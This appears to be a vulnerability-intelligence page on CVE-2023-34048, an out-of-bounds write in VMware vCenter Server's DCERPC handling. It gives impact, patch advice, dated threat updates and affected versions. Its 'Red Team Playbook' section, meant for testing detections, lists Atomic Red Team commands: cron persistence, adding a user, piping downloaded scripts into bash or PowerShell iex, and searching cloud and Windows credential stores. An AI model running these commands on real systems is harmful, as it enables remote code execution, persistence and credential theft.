CVE-2023-34048
Overview
This vulnerability is an out-of-bounds write occurring within the DCERPC protocol implementation of VMware vCenter Server. The flaw arises from improper handling of memory boundaries during processing of specific network requests, leading to memory corruption. The affected component is the DCERPC protocol handler in vCenter Server versions 7.0 and potentially others, which processes remote procedure calls over the network interface.
Vulnerability Description
vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds write potentially leading to remote code execution.
Impact
An unauthenticated attacker with network access to vCenter Server can exploit this vulnerability to execute arbitrary code remotely. This allows full compromise of the virtualization management infrastructure, potentially enabling control over virtual machines and underlying hosts. No user interaction or credentials are required, making it a critical risk for organizations relying on vCenter Server for managing VMware environments. The resulting breach can lead to data exfiltration, lateral movement within the network, and disruption of virtualized services.
Solution
VMware has released security updates addressing this vulnerability in vCenter Server as detailed in advisory VMSA-2023-0023. Users should apply the patches provided for vCenter Server version 7.0 and related releases immediately. Detailed remediation instructions and updated software versions are available at https://www.vmware.com/security/advisories/VMSA-2023-0023.html. No alternative workarounds are specified; patching is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
UNC3886
|
MEDIUM | — | correlation_mitre |
Full Analysis
The recent vulnerability identified in vCenter Server is characterized by an out-of-bounds write flaw within the implementation of the Distributed Computing Environment Remote Procedure Call (DCERPC) protocol. This type of vulnerability occurs when a program writes data outside the boundaries of allocated memory, potentially leading to unpredictable behavior, including crashes or, more critically, the execution of arbitrary code. The severity of this flaw is underscored by its high CVSS score of 9.8, indicating a critical risk level. Attackers can exploit this vulnerability by sending specially crafted requests to the vCenter Server, which may allow them to overwrite memory locations and execute malicious code with the privileges of the vCenter Server process.
The attack vectors for this vulnerability are particularly concerning due to the requirement for network access to the vCenter Server. This means that any malicious actor with the ability to reach the server over the network can attempt to exploit the flaw. Scenarios may involve an attacker gaining access to the internal network of an organization, possibly through phishing, social engineering, or exploiting other vulnerabilities. Once within the network, the attacker could send crafted DCERPC requests to the vCenter Server, triggering the out-of-bounds write and potentially leading to a complete compromise of the server. This could result in unauthorized access to virtual machines, sensitive data, or even the entire infrastructure managed by vCenter.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely heavily on virtualized environments for their operations. A successful exploitation could lead to significant business risks, including data breaches, loss of intellectual property, and disruption of services. The ability to execute arbitrary code could allow attackers to install malware, create backdoors, or pivot to other systems within the network, amplifying the threat. Furthermore, the potential for remote code execution means that attackers could operate from anywhere in the world, making detection and response more challenging for security teams.
To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected versions of vCenter Server. VMware has released updates that address this flaw, and applying these updates should be a critical step in any remediation strategy. Additionally, organizations should implement network segmentation to limit access to the vCenter Server, ensuring that only trusted devices can communicate with it. Intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help identify and block malicious traffic attempting to exploit this vulnerability. Regular security assessments and penetration testing can also aid in identifying potential weaknesses in the network that could be exploited.
In conclusion, the out-of-bounds write vulnerability in vCenter Server poses a significant threat to organizations utilizing this platform for their virtualized environments. The potential for remote code execution, combined with the ease of exploitation, necessitates immediate attention and action from security teams. By implementing robust detection and mitigation strategies, organizations can protect themselves against the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-34048, with our telemetry indicating the first confirmed sighting of exploitation attempts targeting VMware vCenter Server. This development is significant because it transitions the vulnerability from theoretical risk to active threat, underscoring the immediacy of potential compromise via remote code execution. Although no new exploit variants or proof-of-concept releases have surfaced, the emergence of exploitation in the wild elevates the urgency for defenders to prioritize monitoring and response efforts. The association with the UNC3886 group, while not yet linked to ransomware campaigns, suggests that threat actors with advanced capabilities are actively leveraging this vulnerability, which may presage broader offensive use. Consequently, the threat level for CVE-2023-34048 should be reassessed as elevated, reflecting an increased likelihood of targeted attacks against affected environments.
Update 2 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-34048, with detection activity increasing significantly across monitored environments. This surge underscores a growing operational interest from threat actors, particularly those linked to the UNC3886 group, which continues to leverage this vulnerability despite the absence of new exploit variants or ransomware campaigns. The persistence and expansion of these attempts indicate that adversaries are refining their tactics to exploit the DCERPC protocol weakness in VMware vCenter Server, raising the probability of successful remote code execution attacks. Consequently, this evolving exploitation landscape elevates the threat level associated with CVE-2023-34048 to a heightened state, signaling an increased risk for organizations running affected vCenter Server instances and necessitating enhanced vigilance in detection and response measures.
Affected Products (37)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Vcenter Server | All |
cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update2a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update3:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update3a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update3c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update3d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update3e:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-34048 |
| vmware.com |
GitHub CVE
|
https://www.vmware.com/security/advisories/VMSA-2023-0023.html |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/understanding-cve-2023-34048-a-zero-day-out-of-bound-write-in-vcenter-server |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-34048 |